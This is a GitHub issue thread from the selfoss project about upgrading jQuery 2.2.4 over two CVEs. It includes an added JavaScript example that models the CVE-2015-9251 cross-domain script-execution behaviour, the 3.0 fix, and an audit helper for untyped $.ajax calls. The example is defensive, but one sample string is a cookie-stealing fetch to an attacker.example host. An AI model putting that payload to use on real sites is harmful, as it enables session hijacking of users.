
Bump jQuery version #1029

Closed
SSilence opened this issue Mar 24, 2018 · 2 comments · Fixed by #1244
Comments

@SSilence
Member

GitHub reports two security issues with the current jQuery version 2.2.4 used in public/package.json:
https://nvd.nist.gov/vuln/detail/CVE-2016-10707
https://nvd.nist.gov/vuln/detail/CVE-2015-9251

@jtojnar jtojnar added this to the 2.19 milestone Mar 24, 2018
@niol
Collaborator

niol commented Mar 26, 2018

For CVE-2016-10707, I do not think selfoss does AJAX requests to third party sites, so it should not be vulnerable.
For CVE-2015-9251, selfoss does not seem to use the attr function with third party supplied data.
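The comment above reasons about whether selfoss's Ajax calls reach third-party sites. The block below is an added example, not jQuery's or selfoss's code, that models the behaviour behind CVE-2015-9251 (jQuery before 3.0.0 auto-executing a cross-domain response served as `text/javascript` when the caller omitted `dataType`), the 3.0.0 fix (an `ajaxPrefilter` that disables script sniffing for cross-domain requests), and a textual audit helper for finding `$.ajax()` calls that never set `dataType`. Every function and field name (`resolveDataType`, `wouldExecute`, `findUntypedAjaxCalls`, `patched`, the sample source and hostile response) is this example's own assumption.

```javascript
// Added example (not jQuery's or selfoss's code): a model of how jQuery < 3.0.0
// picked the response type for $.ajax() when the caller omitted dataType, the
// behaviour behind CVE-2015-9251, plus the 3.0.0 fix and a source audit helper.
// All function and field names below are this example's own assumptions.

// Content-Type sniffing order, modelled on jQuery's default `contents` map.
const CONTENT_SNIFFERS = [
  [/\b(?:java|ecma)script\b/i, "script"],
  [/\bjson\b/i, "json"],
  [/\bxml\b/i, "xml"],
  [/^text\/html\b/i, "html"],
];

// request: { url, dataType?, crossDomain, patched }   response: { contentType, body }
function resolveDataType(request, response) {
  if (request.dataType) {
    return request.dataType; // an explicit dataType wins; no sniffing happens
  }
  for (const [pattern, type] of CONTENT_SNIFFERS) {
    if (!pattern.test(response.contentType)) continue;
    // jQuery 3.0.0 fix (ajaxPrefilter sets contents.script = false for
    // cross-domain requests): a script Content-Type is no longer auto-detected.
    if (type === "script" && request.crossDomain && request.patched) {
      return "text";
    }
    return type;
  }
  return "text";
}

// True when jQuery would hand the body to globalEval(), i.e. run it as script.
function wouldExecute(request, response) {
  return resolveDataType(request, response) === "script";
}

// Constructed attacker response: a third-party host answering with JavaScript.
const HOSTILE_RESPONSE = {
  contentType: "text/javascript; charset=utf-8",
  body: "fetch('https://attacker.example/steal?c=' + document.cookie)",
};

const scenarios = {
  // Vulnerable: no dataType, cross-domain, jQuery < 3.0.0 -> body is executed.
  untypedOld: wouldExecute(
    { url: "https://thirdparty.example/feed", crossDomain: true, patched: false },
    HOSTILE_RESPONSE),
  // Mitigated by the caller: an explicit dataType keeps the body as data.
  typedOld: wouldExecute(
    { url: "https://thirdparty.example/feed", dataType: "json", crossDomain: true, patched: false },
    HOSTILE_RESPONSE),
  // Mitigated by upgrading: jQuery >= 3.0.0 ignores a script Content-Type cross-domain.
  untypedPatched: wouldExecute(
    { url: "https://thirdparty.example/feed", crossDomain: true, patched: true },
    HOSTILE_RESPONSE),
  // Same-origin responses are still auto-executed; that is not the CVE's case.
  sameOriginPatched: wouldExecute(
    { url: "/api/items", crossDomain: false, patched: true },
    HOSTILE_RESPONSE),
};

// Audit helper: list $.ajax()/jQuery.ajax() calls whose argument text never
// mentions dataType. Textual only (no JS parser), so calls that build their
// options object elsewhere are missed; treat it as a first pass before a manual review.
function findUntypedAjaxCalls(source) {
  const findings = [];
  const callRe = /(?:\$|jQuery)\.ajax\s*\(/g;
  let m;
  while ((m = callRe.exec(source)) !== null) {
    // Walk forward to the parenthesis that closes this call.
    let depth = 1;
    let i = m.index + m[0].length;
    while (i < source.length && depth > 0) {
      if (source[i] === "(") depth++;
      else if (source[i] === ")") depth--;
      i++;
    }
    const args = source.slice(m.index + m[0].length, i - 1);
    if (!/\bdataType\s*:/.test(args)) {
      const line = source.slice(0, m.index).split("\n").length;
      findings.push({ line, snippet: args.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample source, standing in for a scan over a project's JS files.
const SAMPLE_SOURCE = `
$.ajax({ url: 'items', type: 'GET', dataType: 'json', success: render });
jQuery.ajax({ url: remoteUrl, success: function (data) { show(data); } });
$.ajax({
    url: 'tags',
    dataType: 'json'
});
`;
const untyped = findUntypedAjaxCalls(SAMPLE_SOURCE);

console.log(scenarios);
console.log(untyped);
```

The model reproduces only the decision that matters for the CVE: with no `dataType`, pre-3.0 jQuery trusted the response's Content-Type to choose a converter, so a cross-origin host could answer `text/javascript` and have its body evaluated in the page. Either an explicit `dataType` on every call or the upgrade closes that path; the audit helper is how to check the first condition across a code base.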

@jtojnar
Member

jtojnar commented Oct 15, 2019

Quoting from #1134 (comment):

There are many breaking changes regarding Deferred, which will need to be manually checked. And we should probably switch to A+-style promises throughout the codebase.

The remaining deprecations and breaking changes should be addressed in 8e991c4, except for bind() deprecation. That is better left for a separate PR.

@jtojnar jtojnar modified the milestones: 2.19, 3.0 Oct 15, 2019
@jtojnar jtojnar changed the title from "security vulnerabilities in jquery version" to "Bump jQuery version" Oct 16, 2019
@jtojnar jtojnar modified the milestones: 3.0, 2.19 Sep 14, 2020
3 participants